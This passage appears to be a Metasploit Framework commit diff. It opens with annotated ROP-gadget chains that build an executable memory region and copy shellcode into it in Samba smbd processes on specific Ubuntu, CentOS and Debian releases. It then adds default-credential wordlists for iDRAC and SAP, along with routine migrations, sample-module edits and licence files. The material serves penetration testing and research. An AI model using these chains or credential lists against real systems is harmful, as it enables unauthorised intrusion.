<gadget offset="0x0005822d">esi = pop ebx ; pop esi ; pop edi ; ret</gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0005d903">xchg eax, edx ; ret || edx = eax , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x00043cd5">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000008 ; call esi || after call, esi = esp </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x00005c60">xchg eax, esi ; ret</gadget>
<gadget offset="0x0005c45c">pop ecx ; ret</gadget>
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
<gadget offset="0x00053dc4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || ebx = src in memcpy</gadget>
<gadget offset="0x000641ff">pop eax; ret</gadget>
<gadget offset="0x00072ffc">writable add in GOT - 4</gadget>
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = mmaped addr</gadget>
<gadget offset="0x0005cd54">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x000641ff">pop eax; ret</gadget>
<gadget offset="0x0007204c">memcpy@got - 4</gadget>
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x00060e5a">pop esi ; ret</gadget>
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00007d05">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x0005822d">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0005baca">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8</target>
</compatibility>
<!--
dpkg -l|grep libgcrypt
ii libgcrypt11 1.4.5-2ubuntu1 LGPL Crypto library - runtime library
b6a20000-b6a91000 r-xp 00000000 08:01 17247 /lib/libgcrypt.so.11.5.3
b6a91000-b6a92000 r**p 00070000 08:01 17247 /lib/libgcrypt.so.11.5.3
b6a92000-b6a94000 rw-p 00071000 08:01 17247 /lib/libgcrypt.so.11.5.3
-->
<gadgets base="0">
<gadget offset="0x00004634">pop ebx ; pop ebp ; ret</gadget>
<gadget offset="0x00071ff4">offset of .got.plt section</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0006421f">pop eax; ret</gadget>
<gadget offset="0x00072010">mmap@got - 4</gadget>
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x0000922c">jmp eax</gadget>
<gadget offset="0x00004631">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
<gadget offset="0x000417af">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0005d923">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
<gadget offset="0x0005c47b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
<gadget offset="0x0003dbd8">push esp ; and al, 0x0C ; call esi</gadget>
<gadget offset="0x0006421f">pop eax ; ret</gadget>
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
<gadget offset="0x00053c64">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00043999">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x0006421f">pop eax; ret</gadget>
<gadget offset="0x00072094">memcpy@got - 4</gadget>
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x00043999">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<!-- set ecx to same value than edx -->
<gadget offset="0x0006ea7f">xchg eax, esi ; ret || save eax</gadget>
<gadget offset="0x0006421f">pop eax; ret</gadget>
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
<gadget offset="0x0005cd74"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x0006ea7f"> xchg eax, esi ; ret ; || restore eax</gadget>
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00007e05">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x00058245">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x000128cc">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>3.5.10-0.107.el5 on CentOS 5</target>
</compatibility>
<!--
yum list |grep libgcrypt
libgcrypt.i386 1.4.4-5.el5 installed
02c63000-02ce1000 r-xp 00000000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
02ce1000-02ce4000 rwxp 0007d000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
section is writable and executable, we'll copy the shellcode over there instead of using mmap
-->
<gadgets base="0">
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
<gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget>
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget>
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
<gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget>
<gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget>
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
<gadget offset="0x0006a73f">pop eax ; ret</gadget>
<gadget offset="0x0007effc">memcpy@got - 4</gadget>
<gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget>
<gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget>
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
<gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
<gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget>
<gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">junk for ebp **1**</gadget>
<gadget offset="0x0006200a">pushad ; ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<!-- ROP CHAIN for smbd 2:3.5.11~dfsg-1ubuntu2
<compatibility>
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
</compatibility>
<gadgets base="0">
<gadget offset="0x0000f3b1">pop eax; ret</gadget>
<gadget offset="0x00991ff0">mmap64@got</gadget>
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
<gadget offset="0x008c8997">jmp eax</gadget>
<gadget offset="0x0009ee21">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
<gadget offset="0x0034fbd2">pop edx ; ret</gadget>
<gadget offset="0x0099a000">edx = writable location, in GOT</gadget>
<gadget offset="0x0034c2bc">mov dword [edx], eax ; ret; || save EAX (mmaped addr) in GOT</gadget>
<gadget offset="0x001fc04c">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x000a1d24">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x001e0d59">push esp ; pop ebx ; pop esi ; ret || ebx = esp</gadget>
<gadget value ="0x00000000">junk for esi</gadget>
<gadget offset="0x0036fd9a">pop ebp ; ret</gadget>
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
<gadget offset="0x001a73b2">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
<gadget offset="0x0008c5ac">pop eax; ret</gadget>
<gadget offset="0x00991904">memcpy@got</gadget>
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
<gadget offset="0x001726b5">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x006a3bba">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x000b64ec">add esp, 0x4 ; pop esi ; pop edi ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0002ab2c">pushad, ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
ROP CHAIN for smbd 2:3.5.8~dfsg-1ubuntu2
<compatibility>
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
</compatibility>
<gadgets base="0">
<gadget offset="0x0000f445">pop eax; ret</gadget>
<gadget offset="0x008c1008">mmap64@got</gadget>
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
<gadget offset="0x0009e8e4">jmp eax</gadget>
<gadget offset="0x0009db61">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
<gadget offset="0x001f6142">pop edx ; ret</gadget>
<gadget offset="0x008c9000">edx = writable location, in GOT</gadget>
<gadget offset="0x00347b8c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x0021d553">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x001b1fe0">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x000e817f">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = esp</gadget>
<gadget offset="0x00277540">pop ebp ; ret</gadget>
<gadget value ="0x0000003c">value to add to esp to point to shellcode</gadget>
<gadget offset="0x0011d3a6">add eax, ebp ; mov ebx, 0x81FFF807 ; ret </gadget>
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x0000f445">pop eax; ret</gadget>
<gadget offset="0x008c0964">memcpy@got</gadget>
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x0009ee99">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x00148cc6">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0000dbcf">pushad, ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
-->
<!-- ROP CHAIN for smbd 2:3.5.6~dfsg-3squeeze6
<compatibility
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
</compatibility>
<gadgets base="0">
<gadget offset="0x00021cd9">pop eax; ret</gadget>
<gadget offset="0x008cf86c">mmap64@got</gadget>
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
<gadget offset="0x000234e5">jmp eax</gadget>
<gadget offset="0x000b0331">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
<gadget offset="0x0001cf12">pop edx ; ret</gadget>
<gadget offset="0x008d6000">edx = writable location, in GOT</gadget>
<gadget offset="0x00353f4c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x000b98e9">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x006bffd2">mov edx, ecx ; mov eax, edx ; pop ebp ; ret || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x003660e4">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x00394107">pop ebp ; ret</gadget>
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
<gadget offset="0x0017892d">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
<gadget offset="0x00021cd9">pop eax; ret</gadget>
<gadget offset="0x008cf1e8">memcpy@got</gadget>
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0001f666">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x000b9ac5">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x0033e7ea">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x00020453">pushad, ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
-->
</db>

31
data/sql/migrate/20110422000000_convert_binary.rb
View File

@ -4,37 +4,42 @@ class ConvertBinary < ActiveRecord::Migration
class WebPage < ActiveRecord::Base
serialize :headers
end
class WebVuln < ActiveRecord::Base
serialize :params
end
def bfilter(str)
str = str.to_s
str.encoding = 'binary' if str.respond_to?('encoding=')
str.gsub(/[\x00\x7f-\xff]/, '')
end
def self.up
rename_column :web_pages, :body, :body_text
rename_column :web_pages, :request, :request_text
rename_column :web_vulns, :request, :request_text
rename_column :web_vulns, :proof, :proof_text
add_column :web_pages, :body, :binary
add_column :web_pages, :request, :binary
add_column :web_vulns, :request, :binary
add_column :web_vulns, :request, :binary
add_column :web_vulns, :proof, :binary
WebPage.find(:all).each { |r| r.body = r.body_text; r.save! }
WebPage.find(:all).each { |r| r.request = r.request_text; r.save! }
WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! }
WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! }
remove_column :web_pages, :body_text
remove_column :web_pages, :request_text
remove_column :web_vulns, :request_text
remove_column :web_vulns, :proof_text
WebPage.connection.schema_cache.clear!
WebPage.reset_column_information
WebVuln.connection.schema_cache.clear!
WebVuln.reset_column_information
end
def self.down
@ -43,21 +48,25 @@ class ConvertBinary < ActiveRecord::Migration
rename_column :web_pages, :request, :request_binary
rename_column :web_vulns, :request, :request_binary
rename_column :web_vulns, :proof, :proof_binary
add_column :web_pages, :body, :text
add_column :web_pages, :request, :text
add_column :web_vulns, :request, :text
add_column :web_vulns, :proof, :text
WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! }
WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! }
WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
remove_column :web_pages, :body_binary
remove_column :web_pages, :request_binary
remove_column :web_vulns, :request_binary
remove_column :web_vulns, :proof_binary
WebPage.connection.schema_cache.clear!
WebPage.reset_column_information
WebVuln.connection.schema_cache.clear!
WebVuln.reset_column_information
end
end

13
data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb Normal file
View File

@ -0,0 +1,13 @@
class AddOwnerAndPayloadToWebVulns < ActiveRecord::Migration
def self.up
add_column :web_vulns, :owner, :string
add_column :web_vulns, :payload, :text
end
def self.down
remove_column :web_vulns, :owner
remove_column :web_vulns, :payload
end
end

3
data/wordlists/idrac_default_pass.txt Normal file
View File

@ -0,0 +1,3 @@
calvin
123456
password

3
data/wordlists/idrac_default_user.txt Normal file
View File

@ -0,0 +1,3 @@
root
user1
admin

14
data/wordlists/sap_default.txt Normal file
View File

@ -0,0 +1,14 @@
SAP* 06071992
SAP* PASS
DDIC 19920706
DDIC Welcome01
SAPCPIC ADMIN
EARLYWATCH SUPPORT
TMSADM PASSWORD
TMSADM ADMIN
ADMIN welcome
ADSUSER ch4ngeme
ADS_AGENT ch4ngeme
DEVELOPER ch4ngeme
J2EE_ADMIN ch4ngeme
SAPJSF ch4ngeme

14
documentation/samples/modules/auxiliary/sample.rb
View File

@ -1,25 +1,19 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
module Msf
###
#
# This sample auxiliary module simply displays the selected action and
# registers a custom command that will show up when the module is used.
#
###
class Auxiliary::Sample < Msf::Auxiliary
class Metasploit4 < Msf::Auxiliary
def initialize
super(
@ -50,5 +44,3 @@ class Auxiliary::Sample < Msf::Auxiliary
end
end
end

16
documentation/samples/modules/encoders/sample.rb
View File

@ -1,24 +1,17 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
module Msf
module Encoders
###
#
# This sample illustrates a very basic encoder that simply returns the block
# that it's passed.
#
###
class Sample < Msf::Encoder
class Metasploit4 < Msf::Encoder
def initialize
super(
@ -40,6 +33,3 @@ class Sample < Msf::Encoder
end
end
end
end

13
documentation/samples/modules/exploits/sample.rb
View File

@ -1,25 +1,19 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
module Msf
###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Exploits::Sample < Msf::Exploit::Remote
class Metasploit4 < Msf::Exploit::Remote
#
# This exploit affects TCP servers, so we use the TCP client mixin.
@ -88,4 +82,3 @@ class Exploits::Sample < Msf::Exploit::Remote
end
end

16
documentation/samples/modules/nops/sample.rb
View File

@ -1,26 +1,19 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
module Msf
module Nops
###
#
# This class implements a very basic NOP sled generator that just returns a
# string of 0x90's.
#
###
class Sample < Msf::Nop
class Metasploit4 < Msf::Nop
def initialize
super(
@ -39,6 +32,3 @@ class Sample < Msf::Nop
end
end
end
end

18
documentation/samples/modules/payloads/singles/sample.rb
View File

@ -1,26 +1,18 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
module Msf
module Payloads
module Singles
###
#
# This sample payload is designed to trigger a debugger exception via int3.
#
###
module Sample
module Metasploit4
include Msf::Payload::Single
@ -40,7 +32,3 @@ module Sample
end
end
end
end
end

30
external/ruby-kissfft/COPYING vendored
View File

@ -1,30 +0,0 @@
Kiss FFT library
==================
Copyright (c) 2003-2006 Mark Borgerding
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Ruby wrapper layer
==================
Copyright (C) 2009 H D Moore
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

2
external/ruby-kissfft/Gemfile vendored Executable file
View File

@ -0,0 +1,2 @@
source "http://rubygems.org"
gemspec

30
external/ruby-kissfft/LICENSE vendored Normal file
View File

@ -0,0 +1,30 @@
Kiss FFT library
==================
Copyright (c) 2003-2010 Mark Borgerding
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Ruby wrapper layer
==================
Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com >
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

0
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/Rakefile → external/ruby-kissfft/Rakefile vendored
View File

150
external/ruby-kissfft/_kiss_fft_guts.h vendored
View File

@ -1,150 +0,0 @@
/*
Copyright (c) 2003-2004, Mark Borgerding
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
